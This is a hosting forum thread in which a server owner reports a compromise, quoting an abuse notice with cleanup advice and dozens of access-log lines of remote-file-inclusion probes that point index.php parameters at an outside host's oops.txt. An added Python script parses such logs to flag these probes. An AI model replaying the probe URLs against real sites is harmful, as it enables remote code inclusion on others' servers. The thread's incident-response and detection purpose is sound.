Need some help quick please

RadMan (Verified User, Canada)
I think my server has been hacked and it's attacking other servers..

I thought my colo was off his rocker when he first complained to me yesterday.. Today he got another notification from a different source...

Need an experienced Linux/CentOS server admin to check out my server and correct any issues he/she may find..
======================

NOTES:

This type of attack typically means the server to which the attacker's IP address is bound is a compromised server.

Please check the server behind the IP address above for suspicious files in /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox, /var/spool/squid, and /var/spool/cron. Please use "ls -lab" for checking directories, as sometimes compromised servers will have hidden files that a regular "ls" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious processes; oftentimes the malware / hack pretends to be an Apache process.

Linux Malware Detect is an excellent program for finding malware on a server. You can find the latest version at http://www.rfxn.com/projects/linux-malware-detect/

Clam Anti-virus, clamscan, can also be used to find commonly used PHP and Perl-based hacks, including various php shells, on a server using the "--infected" and "--recursive" options.

You may also want to check out rootkit detection tools - http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://www.ossec.net/en/rootcheck.html - as tools which should be used in addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.


Code:
Type of attack:

Sample log report including date and time stamp (1st field is the word "request", 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker):

  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:59 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dt1Qz7pAAADzLoi8 "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:10 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dwlQz7pAAADzInIY "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:21 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-dzVQz7pAAADzFmuE "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:32 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d2FQz7pAAAF1no7s "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:43 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d41Qz7pAAADzdvYM "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:34:54 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d7lQz7pAAADywcZ0 "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:05 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-d@VQz7pAAADy9lTA "-"
  Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:35:16 +0000] "GET /index.php?open=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-eBFQz7pAAADzfwII "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGMpHwk "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:58:53 +0000] "GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jjVQz7pAAAGM3K@A "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:05 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmVQz7pAAABz8XSc "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:06 +0000] "GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jmlQz7pAAABx2DqI "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAAGMpHww "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:17 +0000] "GET /index.php?go=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jpVQz7pAAABx8GVM "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzPqGw "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:29 +0000] "GET /index.php?goto=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jsVQz7pAAADzSqfc "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAABx4Ebg "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:40 +0000] "GET /index.php?jump=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jvFQz7pAAAByOINM "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAABx2Dqw "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:20:59:51 +0000] "GET /index.php?url=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-jx1Qz7pAAAGMrI-U "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMrI-c "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:03 +0000] "GET /index.php?lng=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j01Qz7pAAAGMpHxM "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAAGMpHxU "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:15 +0000] "GET /index.php?get=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j31Qz7pAAABx2DrI "-"
  Request: thelimousinecompany.ie 204.15.197.36 - - [23/Nov/2012:21:00:27 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j61Qz7pAAADzKodQ "-"
  Request: holidayfinders.ie 204.15.197.36 - - [23/Nov/2012:21:00:28 +0000] "GET /index.php?link=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3506 "-" "-" UK-j7FQz7pAAADzFm8I "-"
TIA

Ed
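A small log-triage script, added here as an example (not anything posted in the thread), that parses the "Request:" lines of the abuse report above, plus plain Apache combined-log lines without the vhost prefix, flags any query parameter whose value is a remote URL (the remote-file-inclusion probe shape in the report), and groups the hits by client IP and target vhost. Its sample input is constructed: two lines copied from the report, one benign request, and one plain-format line; run the same code over the compromised host's own access_log to find inbound probes of this shape, which are one place to look for the entry vector RadMan never identified.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Report "Request: <vhost> ..." lines and plain combined-log lines (vhost prefix optional).
LINE_RE = re.compile(
    r'^\s*(?:Request:\s+(?P<vhost>\S+)\s+)?(?P<client>\S+)\s+\S+\s+\S+\s+'
    r'\[(?P<ts>[^\]]+)\]\s+"(?P<method>\S+)\s+(?P<path>\S+)[^"]*"\s+(?P<status>\d{3})'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)

# Constructed sample: two lines from the report above, one benign request, one plain combined-log line.
SAMPLE_LINES = [
    'Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:36 +0000] '
    '"GET /index.php?lang=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-doFQz7pAAADzVrsk "-"',
    'Request: darklite.ie 204.15.197.36 - - [23/Nov/2012:20:33:48 +0000] '
    '"GET /index.php?main=http://5.9.188.62/oops.txt? HTTP/1.1" 500 3518 "-" "-" UK-drFQz7pAAAF0ChVY "-"',
    'Request: darklite.ie 203.0.113.7 - - [23/Nov/2012:20:36:00 +0000] '
    '"GET /index.php?lang=en HTTP/1.1" 200 4120 "-" "-" UK-constructed0001 "-"',
    '198.51.100.9 - - [24/Nov/2012:02:11:09 +0000] '
    '"GET /index.php?page=http://203.0.113.5/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def rfi_params(path):
    """Query parameters whose value is a remote URL: the classic RFI probe shape."""
    query = urlsplit(path).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_URL.match(v)]

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # not a request line (e.g. surrounding prose in the report)
    rec = m.groupdict()
    rec["vhost"] = rec["vhost"] or "-"  # plain combined log has no vhost field
    rec["rfi"] = rfi_params(rec["path"])
    return rec

def summarize(lines):
    """Group RFI probes by (client, vhost): count, parameter names, remote URLs, time span."""
    groups = defaultdict(lambda: {"count": 0, "params": set(), "urls": set(), "first": None, "last": None})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["rfi"]:
            continue
        g = groups[(rec["client"], rec["vhost"])]
        g["count"] += 1
        g["params"].update(k for k, _ in rec["rfi"])
        g["urls"].update(v for _, v in rec["rfi"])
        g["first"], g["last"] = g["first"] or rec["ts"], rec["ts"]
    return dict(groups)
```

A hit with a 200 status on your own server, rather than the 500s in the report, is the one worth pulling the application code for, since it means the include may have succeeded.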

SeLLeRoNe (Super Moderator, A Coruña, Spain)
Hi,

I'm available for this kind of service. Feel free to PM me or send me an email (my email address is in my signature) for a quote.

Regards
 

RadMan (Verified User, Canada)
Hi John.. Scott is still running a scan to source it...

Server has now been updated with the latest versions of pretty well everything including csf v5.71...

It's been running without interruption for almost 700 days.. I'm counting myself lucky :)

Thanks for asking :)

Ed
 

RadMan (Verified User, Canada)
Updating the server seems to have corrected the issues.. No more complaints now.. Not sure what the source of entry was.. :(
 

samadi (New member)
please help me

hello.
I deleted all folders and files in my control panel.
How can I repair my site? I have no backup.
How can I reset my hosting?
please
 

zEitEr (Super Moderator, GMT +7.00)
Hello,

You might want to send me a PM (in English), or a letter in Russian through my website (see my signature lines).